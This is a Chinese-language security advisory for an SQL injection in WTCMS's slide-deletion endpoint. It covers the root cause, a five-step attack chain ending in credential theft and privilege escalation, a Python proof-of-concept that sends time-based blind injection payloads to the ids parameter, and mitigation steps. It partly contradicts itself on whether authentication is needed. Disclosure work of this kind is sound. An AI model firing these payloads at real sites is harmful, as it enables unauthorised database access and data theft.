CVE-2025-13782 WTCMS SlideController SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-13782

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

taosir WTCMS

漏洞概述

CVE-2025-13782是taosir WTCMS内容管理系统中的一个高危SQL注入漏洞，CVSS评分7.3。该漏洞存在于应用管理后台的幻灯片控制器组件中，具体位于application/Admin/Controller/SlideController.class.php文件的delete函数。由于该函数对传入的ids参数未进行充分的安全过滤和参数化处理，导致攻击者可以通过构造恶意的SQL语句实现未授权的数据库操作。漏洞影响范围涵盖WTCMS up to特定提交版本（01a5f68a3dfc2fdddb44eed967bb2d4f60487665）。由于该漏洞可通过HTTP请求远程利用，且无需任何认证即可触发，因此对使用该系统的组织构成了严重的安全威胁。攻击者成功利用此漏洞后，可以获取数据库中的敏感信息，包括用户凭据、业务数据等，甚至可能在特定配置下实现系统层面的远程代码执行。

技术细节

该SQL注入漏洞的根因在于SlideController类的delete方法直接将用户可控的ids参数拼接到SQL查询语句中，而未采用参数化查询或预编译语句等安全编程实践。在application/Admin/Controller/SlideController.class.php文件中，delete函数接收HTTP请求中的ids参数，该参数通常用于指定要删除的幻灯片ID列表。由于缺乏输入验证和SQL语句参数化，攻击者可以在ids参数中注入任意SQL语句片段。常见的攻击手法包括使用UNION SELECT语句联合查询数据库以提取敏感数据，使用时间盲注或布尔盲注技术逐步推断数据库内容，或使用堆叠查询执行额外的数据库操作。由于该接口位于管理后台路径下，理论上需要管理员权限才能访问，但在实际部署中可能存在访问控制配置不当的情况，导致未授权攻击者也能触发该漏洞。攻击者通过构造特定的HTTP POST请求，将恶意SQL代码作为ids参数的值，即可实现对后端数据库的未授权访问和操作。

攻击链分析

STEP 1

步骤1

信息收集：攻击者首先识别目标网站使用的WTCMS版本，确定SlideController组件存在且可访问

STEP 2

步骤2

构造恶意请求：攻击者构造包含SQL注入payload的HTTP POST请求，将恶意SQL代码注入到ids参数中

STEP 3

步骤3

触发漏洞：发送构造的请求到/Admin/Slide/delete端点，由于参数未过滤，恶意SQL代码被执行

STEP 4

步骤4

数据提取：利用UNION SELECT或盲注技术逐步提取数据库中的敏感信息，如用户表、管理员凭据等

STEP 5

步骤5

权限提升：若获取管理员凭据，攻击者可能登录后台管理系统，进一步获取服务器权限

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-13782 SQL Injection PoC for WTCMS SlideController delete function
# Target: application/Admin/Controller/SlideController.class.php
# Parameter: ids
# This PoC demonstrates time-based blind SQL injection

target_url = "http://target.com/index.php/Admin/Slide/delete"

# Time-based blind SQL injection payload
# The payload uses SLEEP() function to verify vulnerability
payloads = [
    "1' AND SLEEP(5)-- ",
    "1' AND SLEEP(5) AND '1'='1",
    "1' OR SLEEP(5)-- "
]

headers = {
    'Content-Type': 'application/x-www-form-urlencoded',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
}

def test_sqli(payload):
    data = {
        'ids': payload
    }
    try:
        print(f"[*] Testing payload: {payload}")
        response = requests.post(target_url, data=data, headers=headers, timeout=10)
        print(f"[+] Response status: {response.status_code}")
        return response.elapsed.total_seconds()
    except requests.exceptions.Timeout:
        print("[!] Request timed out - likely vulnerable to SQL injection")
        return 5
    except Exception as e:
        print(f"[-] Error: {str(e)}")
        return 0

if __name__ == "__main__":
    print("[*] CVE-2025-13782 WTCMS SQL Injection PoC")
    print("[*] Target: SlideController delete function")
    print("-" * 50)
    
    for payload in payloads:
        elapsed = test_sqli(payload)
        if elapsed >= 5:
            print(f"[+] Target is VULNERABLE with payload: {payload}")
            break
    else:
        print("[-] Target may not be vulnerable or not reachable")

影响范围

taosir WTCMS <= 01a5f68a3dfc2fdddb44eed967bb2d4f60487665

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1）通过Web服务器配置限制对/Admin/Slide/delete路径的访问，仅允许可信IP访问管理后台；2）在应用层前端部署输入过滤中间件，对ids参数进行SQL关键字过滤；3）临时禁用Slide模块的删除功能；4）启用数据库操作日志监控，及时发现异常SQL行为；5）考虑使用云WAF服务提供商的SQL注入防护规则。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-13782
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-13782
3 Details https://www.cvedetails.com/cve/CVE-2025-13782/
4 VulDB https://vuldb.com/cve/CVE-2025-13782
5 Link https://vuldb.com/?ctiid.333786
6 Link https://vuldb.com/?id.333786
7 Link https://vuldb.com/?submit.688837
8 Link https://www.yuque.com/shangu-vvuup/ydpg69/amhlbdhkw0pgt44g?singleDoc
9 Link https://www.yuque.com/shangu-vvuup/ydpg69/amhlbdhkw0pgt44g?singleDoc#